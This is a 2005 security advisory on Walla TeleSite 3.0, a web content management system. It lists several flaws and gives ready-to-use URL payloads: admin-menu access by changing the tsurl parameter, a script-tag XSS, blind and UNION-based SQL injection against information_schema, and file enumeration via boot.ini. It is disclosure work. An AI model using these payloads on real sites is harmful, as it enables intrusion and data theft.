walla30.txt

2005-11-15T00:00:00
ID PACKETSTORM:41546
Type packetstorm
Reporter Rafi Nahum
Modified 2005-11-15T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: Walla TeleSite  
Vendors: http://www.walla.co.il  
Versions: 3.0 and perior  
Platforms: Windows (ISAPI, a few vulnerabilities apply Linux too)  
Bug: Multiple Vulnerabilities  
Exploitation: Remote with browser  
Date: 13 Nov 2005  
Author: Rafi Nahum, Pokerface  
e-mail: rafiware@bezeqint.net  
web: Not Yet....but soon  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
Walla TeleSite is a Website Content Managment CGI web application.  
It is very common amoung big israeli websites. It also used as a wrapper to  
all the website links. It is also used by Walla.co.il and the Walla.com  
Network.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
The TeleSite wraps the website with templates and ids to all the links.  
The main navigation page ts.exe receives a parameter called 'tsurl' and it  
does  
not verifies/limits the numbers it receives, for example it should receive  
0.22.1.0  
if there is such a page, but it shouldn't 0.1.0.0 because it leads to the  
private articles  
menu of administrator.  
  
In addition, further input filtering is missing in the webpages  
Get/Post/Cookie parameters, this is a "feature" missing to this software  
which causes  
the web programmers using this website content managment engine to think  
their parameters  
are filtered, well they are'nt and this causes all their clients to have  
Script and SQL Injections.  
Where it is obvious that an SQL Injection may lead to complete remote  
compromise if the  
website and XSS to content spoofing, phishing, cookie stealing, D.O.S  
attacks and more.  
  
The TeleSite application also does not saves the errors to itself...in an  
error.log or something  
similar, it informs the attacker with the local path of the files it could  
not open/access when  
the attacker tempares with the website parameters. A remote attacker can  
also enumerate  
all the files on the machine by supplying their full path to ts.cgi after  
the querystring.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
Articles Menu Access:  
--------------------------------  
http://host/ts.exe?tsurl=0.1.0.0  
  
  
Cross Site Scripting - XSS:  
--------------------------------------  
  
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr  
ipt>alert()</script>  
  
  
Blind SQL Injection:  
-----------------------------  
Proof Of Concept:  
  
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%  
20'1'='1  
  
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%  
20'1'='2  
  
Exploitation:  
  
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2  
0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu  
ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry  
y','poo','polo','nike'%20from%20information_schema.columns--  
  
  
Local Path Disclosure:  
-------------------------------  
D:\TeleSite\online\templates\\example\sections\header  
  
  
Local File Enumeration:  
---------------------------------  
http://host/ts.cgi?c:\boot.ini  
http://host/ts.cgi?c:\boot1.ini  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Rafi Nahum, Pokerface  
Greetings to The-Insider  
  
"Pokerface is the name, reputation follows."  
  
`